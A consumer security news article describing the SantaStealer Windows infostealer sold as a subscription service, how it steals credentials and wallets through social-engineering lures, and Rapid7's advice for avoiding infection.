The holiday season may be nearly gone, but for some of Windows users, Christmas might have brought an unwelcome surprise. The stock’s greatest concern this year is not any broken gadget, but the password-stealing malware called SantaStealer.
And unlike the real Santa, this one takes credentials, wallets, and sensitive data. The security researchers from Rapid7 Labs first spotted SantaStealer at the beginning of December, where it was just in time to take part in the online busiest season of the year.
Milan Spinka, a security researcher and ethical hacker at Rapid7, informed that the malware was introduced to the market before Christmas, and it was already being sold through Telegram channels and in underground cybercrime marketplaces.
What is SantaStealer?
SantaStealer functions as malware as a service tool, which means that criminals who want to use it can pay a monthly subscription. The first step after the deployment is to gather and steal sensitive documents, usernames, passwords, cryptocurrency wallets, and application data from a very wide range.
Spinks confirms that it is so sneaky that the users might not even be aware of it, as the malware runs entirely in memory, which makes it very difficult to detect from traditional security scans that many users actually rely on.
Method of Action of the Malware on Windows Systems
SantaStealer is a modular threat, which means that the attackers can activate different functions according to their requirements. Desktop screenshot capturing and data extraction from popular apps like Google Chrome are among its features.
Though the malware is capable of dodging Chrome’s app-bound encryption protections, the researchers are indicating that this is not a remote exploit. On the contrary, the method involves the victim to manually execute an embedded file, mostly after being deceived into thinking it’s genuine.
The service is priced at $175 to $300 per month and appears to be operated by a Russian-speaking developer. Although that pricing restricts the number of access to such a serious threat, it also ensures that the malware is used intentionally and not randomly.
This ultimately increases the risk for users who fall into expertly designed social-engineering traps.
What Makes Things Worse and How to Reduce the Risk?
The holiday seasons are among the most favorite times for cyber criminals, as people are more likely to press the links that are unfamiliar to them, download cracked software or simply run files that offer such things as game cheats, discounts or even human verification checks.
Spinka claims that hackers based their operations on heavy reliance on fake tech support messages or on instructions asking users to run commands on their own personal computers.
To minimize the risk of being infected, Rapid7 suggests being very careful with unknown e-mail attachments, suspicious links, and requests for system-level actions.
The running of unverified codes, pirated software, or browser extensions from untrusted sources greatly increases the threat exposure from SantaStealer. Microsoft provides a variety of security resources and also offers professional security guidance to help Windows users in the early detection and prevention of malicious activity before it causes severe damage.
SantaStealer is a strong warning that cyber threats do not have holidays. As users move into the New Year, online vigilance is as vital as creating strong passwords or installing updates.
The festive season may be over, but cybercriminals are still working and this is one Santa you definitely don’t want to pay another visit.
